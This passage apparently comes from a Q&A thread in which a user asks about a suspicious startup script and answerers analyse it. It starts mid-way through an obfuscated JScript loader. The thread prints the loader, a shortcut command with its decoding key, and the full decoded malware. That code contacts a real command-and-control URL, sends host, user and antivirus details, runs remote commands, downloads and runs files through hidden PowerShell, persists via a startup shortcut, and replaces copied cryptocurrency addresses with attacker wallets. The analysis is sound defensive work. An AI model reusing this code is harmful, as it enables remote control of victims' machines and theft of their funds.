            if (code.charAt(i) == key.charAt(x)) {
                dcode += keyStr.charAt(x);
                break;
            }

        }

    }

    code = bintostr(base64decode(dcode));
    new Function(code)();


    function bintostr(arr) {
        var s = WScript.CreateObject("ADODB.Stream");
        s.Type = 1;
        s.Open();
        s.Write(arr);
        s.Position = 0;
        s.Type = 2;
        s.CharSet = "us-ascii";
        var c = s.ReadText();
        s.Close();
        return c;
    }

    function base64decode(vCode) {
        var oXML = WScript.CreateObject("Msxml2.DOMDocument.3.0");
        var oNode = oXML.createElement("base64");
        oNode.dataType = "bin.base64";
        oNode.text = vCode;
        return oNode.nodeTypedValue;
    }
}
catch (err) { }
```

Sincerely,
Alex

Comment: The `ws.exe` program I suspect is just a renamed copy of `wscript.exe` (as command switches are the same). The `ws` file is just a JScript with extension removed to make it less obvious (why the shortcut used the Scripting Engine flag `/E` to force it to treat the `ws` file as JScript. You could probably comment out the line `new Function(code)();` safely and write the `code` variable out to a file to see what the decoded script looks like.

Comment: Hi user692942. Yes, that is what I was suspecting too. For the shortcut command. I've tried to change the flag "/b" to "/d" for debugging or "/i" to the opposite of flag "/b". And ran the shortcut again, nothing happened (at least not visually). Two tasks IDed "ws.exe" appear on task manager. I've ended those task. I am suspecting the script reads out my keystroke and stored it to memory and some other programs pick up those strings and transmitted to the hackers. I've also tried to scan the computer with MS Defender but the result showed clean.

Comment: Can you please give me more points regarding the following? - "safely and write the code variable out to a file to see what the decoded script looks like". Thank you.

Answer (score 1):

UPDATE: I found where it came from using a custom HIPS configuration, its dropped by an illegitimate version of MiniTool Partition manager, that works but injects the file upon loading

[image]

I believe I have the answer for you, I just found the exact same files in the exact same locations, with only a different de-obfuscation key... in the shortcut

```
C:\Users\Ty\AppData\Roaming\WS\ws.exe /E:jscript /b C:\Users\Ty\AppData\Roaming\WS\ws EpmTG6iCDsBeVLWu8agXIy7=9PcM2ftkdFSj4KbhxQ1qrzAn+YoN/3UJR5wv0ZHOl
```

[here is the entire story](https://forum.eset.com/topic/29266-infected-undetected-script-wscriptexe-loading-from-startup-folder/) So, I created a batch file to execute the payload in an online malware analysis machine. It was planted on my machine but unable to execute due to windows security settings.

It connects to a command and control center at http://api.backend-chat.com/connect likely to grab a prepared payload of sorts, likely mimikatz or meterpeter, to further exploit the machine, perhaps based on the machines characteristics. It may query the machine possibly for anti-virtualization. The target url has no malicious data associated with it suggesting this could be a very targeted and or fresh attack, the C&C is probably quite new, and may be only an intermediary or a relay to the primary C&C.

There is a "Bad response status for URL", which uses an HTTP only connection, which could suggest this is meant to be intercepted via MITM and not necessarily by the website itself, or it is only allowing particular IP's to connect, or its down.

It also [connects to](https://otx.alienvault.com/indicator/ip/20.49.150.241/) a cloud provider, 20.49.150.241  in London, United Kingdom of Great Britain and Northern Ireland, which has been associated with pushing wannacry, and other malware.

This version of Ws.exe is designed for windows 10 machines only.

Here are a few things it does:

1. Command and Scripting Interpreter :: Unix Shell
2. Hide Artifacts :: NTFS File Attributes
3. Query Registry
4. System Information Discovery

here are the results, click TTPs, IOC's, and Behavior:
(References to certutil or"Ingress Tool Transfer" are just my addition in order to create a script that worked on these machines)

https://analyze.intezer.com/analyses/6a7b919d-7f40-4019-9e6b-7f6bc7c5be89

and

https://www.hybrid-analysis.com/sample/e0f8a75737f932454aa9a325d35a7abc837fd05c23b5a5d1360d6ba1a6fb6479/60fbc6767746783ee4496bf6

If you would like to try this with your version of the malware, download https://batch-man.com/in2batch/ use it to sign the "WS" file, use the temp folder option, and simply copy everything from ws on in the .lnk address and paste it into the end of the batch file such as:

```
START wscript.exe /E:jscript /b %TEMP%\ws EpmTG6iCDsBeVLWu8agXIy7=9PcM2ftkdFSj4KbhxQ1qrzAn+YoN/3UJR5wv0ZHOl
```

Then send it to the aforementioned platform and share your results.

Comment: Wow you guys are such geniuses! Thank you for the details. I am at work checking back on this and found answers from both of you. It will take me sometimes to digest the code. Thank you very much for the input again!

p.s. I found the root cause of it, it came with the installation of a crack program and removed the program. Ran additional virus and malware scan to make sure there is no residue left.

Comment: I have the same issue. Which program was it?

Answer (score 1):

I ran the code in the browser using JSFiddle.
Here is decoded code: https://jsfiddle.net/g4a0mwue/

```
var TwavA4xjSA = new ActiveXObject(\&quot;WScript.Shell\&quot;);
var v81mxZnvyj0wm = new ActiveXObject(\&quot;Scripting.FileSystemObject\&quot;);
var ZFKUuv2t12Af = \&quot;|V|\&quot;;
var UV1oAmOp0S3 = \&quot;\\\&quot;;
var V7vFcwq3wUVRrsgcv = \&quot;rack_2.0.0.0\&quot;;
var nb0MawLGyrxf = V7vFcwq3wUVRrsgcv + '_' + B6ZqvVzzJXq27j();
var AuVAfc591z0Yw = XF3a8JO3r5r8G(\&quot;temp\&quot;) + '\\';
var svauXHdYmXwV1whE = WScript[\&quot;ScriptFullName\&quot;];
var aWOPoMdm8aLL89 = WScript[\&quot;ScriptName\&quot;];
var qsjfwimUhft = 1;
var EwcQB8qBuCScs = \&quot;powershell.exe\&quot;;
WScript[\&quot;Sleep\&quot;](5000);


while (true) {
    try {
        var kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw();
        var Fd1Jal88zKyxij = kk9XDcoU8Sfo692[\&quot;split\&quot;](ZFKUuv2t12Af);
        var ivI0sA6txn5XPifq = Fd1Jal88zKyxij[0];
        var JkByjqH1xztsW2YUG = Fd1Jal88zKyxij[1];
        ivI0sA6txn5XPifq === \&quot;Ex\&quot; &amp;&amp; eval(JkByjqH1xztsW2YUG);
        ivI0sA6txn5XPifq === \&quot;Cmd\&quot; &amp;&amp; TwavA4xjSA[\&quot;Run\&quot;](JkByjqH1xztsW2YUG, 0, false);
        if (ivI0sA6txn5XPifq === \&quot;DwnlExe\&quot;) {
            var path = AuVAfc591z0Yw + Fd1Jal88zKyxij[2];
            var cmd = Fd1Jal88zKyxij[3] + path;
            yQM1ybBDSjEP(Fd1Jal88zKyxij[1], path, true);
            WScript[\&quot;Sleep\&quot;](1000);
            TwavA4xjSA[\&quot;Run\&quot;](cmd, 0, false);
        }
        ivI0sA6txn5XPifq === \&quot;SelfRemove\&quot; &amp;&amp; Gn4bSDMHKIxEE8UP7wZJ(true);
        if (ivI0sA6txn5XPifq === \&quot;UpdateS\&quot;) {
            var path = XF3a8JO3r5r8G(\&quot;appdata\&quot;) + '\\WS\\ws';
            yQM1ybBDSjEP(Fd1Jal88zKyxij[1], path, true);
            if (v81mxZnvyj0wm[\&quot;fileexists\&quot;](path)) {
                var lnkPath = XF3a8JO3r5r8G(\&quot;appdata\&quot;) + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ws.lnk';
                var WSexe = XF3a8JO3r5r8G(\&quot;appdata\&quot;) + '\\WS\\ws.exe';
                var args = \&quot;/b /e:jscript \\&quot;\&quot; + path + \&quot;\\&quot; \&quot; + Fd1Jal88zKyxij[2];
                CreateLnk(WSexe, args, lnkPath);
                WScript[\&quot;Sleep\&quot;](qsjfwimUhft * (1000));
                TwavA4xjSA[\&quot;Run\&quot;](\&quot;\\&quot;\&quot; + WSexe + \&quot;\\&quot;\&quot; + \&quot; \&quot; + args, 0, false);
                WScript[\&quot;Quit\&quot;](0);
            }
        }
        try {
            Pz8qARfSLqseILucV();
        } catch (eer) { }
        WScript[\&quot;Sleep\&quot;](1000);
    } catch (errs) {


    }

}


function CreateLnk(target, args, path) {
    var shell = new ActiveXObject(\&quot;WScript.Shell\&quot;);
    var shortcut = shell.CreateShortcut(path);
    shortcut.TargetPath = target;
    shortcut.Arguments = args;
    shortcut.Save();
}


function oUjmVhxHJ4Qhrw(apu6jskb89z5ungc, ijunq6e5ivimimy) {
    var Apu6jskb89z5ungc = new ActiveXObject(\&quot;Microsoft.XMLHTTP\&quot;);
    Apu6jskb89z5ungc[\&quot;open\&quot;](\&quot;POST\&quot;, \&quot;http://api.backend-chat.com/connect\&quot;, false);
    var I2sugczmlz9bhyb = getUserAgent();
    Apu6jskb89z5ungc[\&quot;SetRequestHeader\&quot;](\&quot;X-User-Agent:\&quot;, I2sugczmlz9bhyb);
    ijunq6e5ivimimy &amp;&amp; Apu6jskb89z5ungc[\&quot;SetRequestHeader\&quot;](\&quot;X-notify:\&quot;, ijunq6e5ivimimy);
    Apu6jskb89z5ungc[\&quot;send\&quot;](apu6jskb89z5ungc);
    return Apu6jskb89z5ungc[\&quot;responsetext\&quot;];
}



function getUserAgent() {
    var iJunq6e5ivimimy;
    v81mxZnvyj0wm[\&quot;fileexists\&quot;](XF3a8JO3r5r8G(\&quot;Windir\&quot;) + \&quot;\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\&quot;) ? iJunq6e5ivimimy = \&quot;YES\&quot; : iJunq6e5ivimimy = \&quot;NO\&quot;;
    return nb0MawLGyrxf + UV1oAmOp0S3 + vxUABGtfQ7B7(XF3a8JO3r5r8G(\&quot;COMPUTERNAME\&quot;)) + UV1oAmOp0S3 + vxUABGtfQ7B7(XF3a8JO3r5r8G(\&quot;USERNAME\&quot;)) + UV1oAmOp0S3 + vxUABGtfQ7B7(ik9hXhN11R()) + \&quot; [\&quot; + P9TEtu77LCNtD() + \&quot;]\&quot; + UV1oAmOp0S3 + vxUABGtfQ7B7(TmBvivf3Wwj8U7NzZh()) + UV1oAmOp0S3 + iJunq6e5ivimimy + UV1oAmOp0S3;
}


function XF3a8JO3r5r8G(RxU8qokkj42kewlgy) {
    return TwavA4xjSA[\&quot;ExpandEnvironmentStrings\&quot;]('%' + RxU8qokkj42kewlgy + '%');
}


function B6ZqvVzzJXq27j() {
    var iJUnq6e5ivimimy = GetObject(\&quot;winmgmts:\&quot;)[\&quot;InstancesOf\&quot;](\&quot;win32_logicaldisk\&quot;);
    var cGB89nkexkd = new Enumerator(iJUnq6e5ivimimy);
    for (; !cGB89nkexkd[\&quot;atEnd\&quot;](); cGB89nkexkd[\&quot;moveNext\&quot;]()) {
        var i2SUgczmlz9bhyb = cGB89nkexkd[\&quot;item\&quot;]();
        return i2SUgczmlz9bhyb[\&quot;volumeserialnumber\&quot;];
        break;
    }
}


function ik9hXhN11R() {
    var CGB89nkexkd = GetObject(\&quot;winmgmts:\&quot;)[\&quot;InstancesOf\&quot;](\&quot;Win32_OperatingSystem\&quot;);
    var RXU8qokkj42kewlgy = new Enumerator(CGB89nkexkd);
    for (; !RXU8qokkj42kewlgy[\&quot;atEnd\&quot;](); RXU8qokkj42kewlgy[\&quot;moveNext\&quot;]()) {
        var APU6jskb89z5ungc = RXU8qokkj42kewlgy[\&quot;item\&quot;]();
        return APU6jskb89z5ungc[\&quot;Caption\&quot;];
        break;
    }
}


function P9TEtu77LCNtD() {
    return GetObject(\&quot;winmgmts:root\\cimv2:Win32_Processor='cpu0'\&quot;)[\&quot;AddressWidth\&quot;];
}


function getEnav(apu6Jskb89z5ungc) {
    var IjuNq6e5ivimimy = igNY4Ls7yOa2yB9d(apu6Jskb89z5ungc)[\&quot;substr\&quot;](3, 2);
    var I2suGczmlz9bhyb = \&quot;Unknown\&quot;;
    if ((IjuNq6e5ivimimy == '10') || (IjuNq6e5ivimimy == '11')) { I2suGczmlz9bhyb = \&quot;Enabled\&quot; }
    else if ((IjuNq6e5ivimimy == '00') || (IjuNq6e5ivimimy == '01') || (IjuNq6e5ivimimy == '20') || (IjuNq6e5ivimimy == '21')) { I2suGczmlz9bhyb = \&quot;Disabled\&quot; }
    return I2suGczmlz9bhyb;
}


function Pz8qARfSLqseILucV() {
    var i2sUGczmlz9bhyb = \&quot;12uYbFHKNbrJPoH76ciqyi3LhBePUg8xwU\&quot;;
    var RxU8Qokkj42kewlgy = \&quot;0xB0463Ff7467D93D65d2038f6483eFBAe8b8D8fbe\&quot;;
    var CgB89Nkexkd = \&quot;qzfgdnac5k2amf9k5y9qa76zxzz4ekqnyyz7lda5x7\&quot;;
    var rxU8Qokkj42kewlgy = \&quot;3CQN5PhAugANTPWbPFxrLHEYrxnZcEQhVQ\&quot;;
    var cGB89Nkexkd = \&quot;bc1qt6djaquj5tvs6vxtrq2m4s5uxjudkk565s8tyg\&quot;;
    var CGb89Nkexkd = \&quot;TDkSGpQqCPbkSukfAZf92krzmrQ2fhv9GQ\&quot;;
    var APu6Jskb89z5ungc = \&quot;bnb18gura4hu27fze90xvyly7mwfwlw0k3ksrcx8r6\&quot;;

    var i2SUGczmlz9bhyb = WScript[\&quot;CreateObject\&quot;](\&quot;htmlfile\&quot;);
    var nRXEe4h5hiwgi = i2SUGczmlz9bhyb[\&quot;parentWindow\&quot;][\&quot;clipboardData\&quot;][\&quot;getData\&quot;](\&quot;text\&quot;)[\&quot;replace\&quot;](/^\s+|\s+$/g, '');

    var I2sUGczmlz9bhyb = /^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$/g;
    var NrXEe4h5hiwgi = I2sUGczmlz9bhyb[\&quot;test\&quot;](nRXEe4h5hiwgi);

    var ApU6Jskb89z5ungc = /^0x[a-fA-F0-9]{40}$/g;
    var ijUNq6e5ivimimy = ApU6Jskb89z5ungc[\&quot;test\&quot;](nRXEe4h5hiwgi);

    var aPU6Jskb89z5ungc = /^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$/g;
    var nrXEe4h5hiwgi = aPU6Jskb89z5ungc[\&quot;test\&quot;](nRXEe4h5hiwgi);

    var rXU8Qokkj42kewlgy = /^[T]\w{33}$/g;
    var NRxEe4h5hiwgi = rXU8Qokkj42kewlgy[\&quot;test\&quot;](nRXEe4h5hiwgi);

    var IjUNq6e5ivimimy = /^\b(bc(0([ac-hj-np-z02-9]{39}|[ac-hj-np-z02-9]{59})|1[ac-hj-np-z02-9]{8,87})|[13][a-km-zA-HJ-NP-Z1-9]{25,35})\b$/g;
    var apU6Jskb89z5ungc = IjUNq6e5ivimimy[\&quot;test\&quot;](nRXEe4h5hiwgi);

    var I2SuGczmlz9bhyb = /^[bnb]\w{41}$/g;
    var cgB89Nkexkd = I2SuGczmlz9bhyb[\&quot;test\&quot;](nRXEe4h5hiwgi);

    function func(a, b, c, d, e, f) {
        return a(b, c, d, e, f);
    }

    function ne(IJUNq6e5ivimimy, CGB89Nkexkd) {
        return IJUNq6e5ivimimy != CGB89Nkexkd;
    }

    function concat(IjunQ6e5ivimimy, Apu6jSkb89z5ungc) {
        return IjunQ6e5ivimimy + Apu6jSkb89z5ungc;
    }

    if (NrXEe4h5hiwgi &amp;&amp; (nRXEe4h5hiwgi != i2sUGczmlz9bhyb)) {
        if (func(TXgZ5jF1eY8xOF, nRXEe4h5hiwgi[\&quot;toLowerCase\&quot;](), \&quot;3\&quot;)) ne(nRXEe4h5hiwgi, rxU8Qokkj42kewlgy) &amp;&amp; func(HjTbQAnqRveFF, rxU8Qokkj42kewlgy);
        else func(TXgZ5jF1eY8xOF, nRXEe4h5hiwgi[\&quot;toLowerCase\&quot;](), \&quot;bc\&quot;) ? ne(nRXEe4h5hiwgi, cGB89Nkexkd) &amp;&amp; func(HjTbQAnqRveFF, cGB89Nkexkd) : func(HjTbQAnqRveFF, i2sUGczmlz9bhyb);
        func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi));
    } else {

        if (ijUNq6e5ivimimy &amp;&amp; ne(nRXEe4h5hiwgi, RxU8Qokkj42kewlgy)) func(HjTbQAnqRveFF, RxU8Qokkj42kewlgy), func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi));
        else {
            if (nrXEe4h5hiwgi &amp;&amp; ne(nRXEe4h5hiwgi, CgB89Nkexkd)) func(HjTbQAnqRveFF, CgB89Nkexkd), func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi));
            else {
                if (apU6Jskb89z5ungc &amp;&amp; ne(nRXEe4h5hiwgi, i2sUGczmlz9bhyb)) func(TXgZ5jF1eY8xOF, nRXEe4h5hiwgi[\&quot;toLowerCase\&quot;](), \&quot;bc\&quot;) ? ne(nRXEe4h5hiwgi, cGB89Nkexkd) &amp;&amp; func(HjTbQAnqRveFF, cGB89Nkexkd) : func(HjTbQAnqRveFF, i2sUGczmlz9bhyb), func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi));
                else {
                    if (NRxEe4h5hiwgi &amp;&amp; ne(nRXEe4h5hiwgi, CGb89Nkexkd)) func(HjTbQAnqRveFF, CGb89Nkexkd), func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi));
                    else cgB89Nkexkd &amp;&amp; ne(nRXEe4h5hiwgi, APu6Jskb89z5ungc) &amp;&amp; (func(HjTbQAnqRveFF, APu6Jskb89z5ungc), func(oUjmVhxHJ4Qhrw, '', concat(\&quot;cbBEHOnline-\&quot;, nRXEe4h5hiwgi)));
                }
            }
        }

    }

}


function igNY4Ls7yOa2yB9d(NRXeE4h5hiwgi) {
    return '0x' + NRXeE4h5hiwgi.toString(16).toUpperCase();
}


function TmBvivf3Wwj8U7NzZh() {

    var cGb89NKexkd;
    var Cgb89NKexkd = [];
    var rXu8QOkkj42kewlgy = \&quot;winmgmts:\\\\localhost\\root\\securitycenter\&quot;;

    try {
        cGb89NKexkd = GetObject(rXu8QOkkj42kewlgy)[\&quot;InstancesOf\&quot;](\&quot;AntiVirusProduct\&quot;);
        var Rxu8QOkkj42kewlgy = new Enumerator(cGb89NKexkd);
        for (; !Rxu8QOkkj42kewlgy[\&quot;atEnd\&quot;](); Rxu8QOkkj42kewlgy[\&quot;moveNext\&quot;]()) {
            var NrxEE4h5hiwgi = Rxu8QOkkj42kewlgy[\&quot;item\&quot;]();
            var iJuNQ6e5ivimimy = NrxEE4h5hiwgi[\&quot;DisplayName\&quot;];
            Cgb89NKexkd[\&quot;push\&quot;](iJuNQ6e5ivimimy + \&quot; [\&quot; + getEnav(NrxEE4h5hiwgi[\&quot;productState\&quot;]) + \&quot;]\&quot;);
        }
    } catch (RxU8QOkkj42kewlgy) { }

    if (iJuNQ6e5ivimimy !== '') {
        rXu8QOkkj42kewlgy = (rXu8QOkkj42kewlgy + '2');
        try {
            cGb89NKexkd = GetObject(rXu8QOkkj42kewlgy)[\&quot;InstancesOf\&quot;](\&quot;AntiVirusProduct\&quot;);
            Rxu8QOkkj42kewlgy = new Enumerator(cGb89NKexkd);
            for (; !Rxu8QOkkj42kewlgy[\&quot;atEnd\&quot;](); Rxu8QOkkj42kewlgy[\&quot;moveNext\&quot;]()) {
                NrxEE4h5hiwgi = Rxu8QOkkj42kewlgy[\&quot;item\&quot;]();
                iJuNQ6e5ivimimy = NrxEE4h5hiwgi[\&quot;DisplayName\&quot;];
                Cgb89NKexkd[\&quot;push\&quot;](iJuNQ6e5ivimimy + \&quot; [\&quot; + getEnav(NrxEE4h5hiwgi[\&quot;productState\&quot;]) + \&quot;]\&quot;);
            }
        } catch (IjUNQ6e5ivimimy) { }
    } else { }

    var nRxEE4h5hiwgi = Cgb89NKexkd[\&quot;join\&quot;](\&quot; , \&quot;);
    return nRxEE4h5hiwgi;

}


function vxUABGtfQ7B7(I2sugcZmlz9bhyb) {
    var Nrxee4H5hiwgi = I2sugcZmlz9bhyb[\&quot;charAt\&quot;](0)[\&quot;toUpperCase\&quot;]() + I2sugcZmlz9bhyb[\&quot;slice\&quot;](1);
    return Nrxee4H5hiwgi = Nrxee4H5hiwgi[\&quot;replace\&quot;](\&quot;\\\&quot;, ''), Nrxee4H5hiwgi;
}


function HjTbQAnqRveFF(nrXEe4H5hiwgi) {

    function nee(RxU8QoKkj42kewlgy, NrXEe4H5hiwgi) {
        return RxU8QoKkj42kewlgy !== NrXEe4H5hiwgi;
    }

    function concat(IjunQ6e5ivimimy, Apu6jSkb89z5ungc) {
        return IjunQ6e5ivimimy + Apu6jSkb89z5ungc;
    }

    var ApU6JsKb89z5ungc = ik9hXhN11R();
    nee(ApU6JsKb89z5ungc[\&quot;indexOf\&quot;](\&quot;Windows 10\&quot;), -1) ? TwavA4xjSA[\&quot;Run\&quot;](concat(concat(concat(EwcQB8qBuCScs, \&quot; scb \\&quot;\&quot;), nrXEe4H5hiwgi), \&quot;\\&quot;\&quot;), 0, false) : TwavA4xjSA[\&quot;Run\&quot;](concat(concat(\&quot;cmd.exe /c echo|set /p=\&quot;, nrXEe4H5hiwgi), \&quot;|clip\&quot;), 0, false);

}


function TXgZ5jF1eY8xOF(RXU8QoKkj42kewlgy, APU6JsKb89z5ungc) {

    return (RXU8QoKkj42kewlgy[\&quot;lastIndexOf\&quot;](APU6JsKb89z5ungc, 0) == 0);
}


function Gn4bSDMHKIxEE8UP7wZJ(Cgb89nkExkd) {

    TwavA4xjSA[\&quot;Run\&quot;](EwcQB8qBuCScs + \&quot; del '\&quot; + svauXHdYmXwV1whE + \&quot;'\&quot;, 0, false);
    Cgb89nkExkd &amp;&amp; WScript[\&quot;Quit\&quot;](1);
}


function yQM1ybBDSjEP(CGb89nkExkd, APu6jsKb89z5ungc, IJunq6E5ivimimy) {
    var cmd = EwcQB8qBuCScs + \&quot; -WindowStyle Hidden -Command \\&quot;$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile('\&quot; + CGb89nkExkd + \&quot;','\&quot; + APu6jsKb89z5ungc + \&quot;')\\&quot;\&quot;;
    TwavA4xjSA[\&quot;Run\&quot;](cmd, 0, IJunq6E5ivimimy);
}
```

It is 42 functions in 537 lines of obfuscated code.

When it does the request to the server it does set a User-Agent header, so the server might not respond differently you when visiting it with a web browser. It also includes a header by the name `X-notify`.

It uses PowerShell to fetch an additional payload from the server.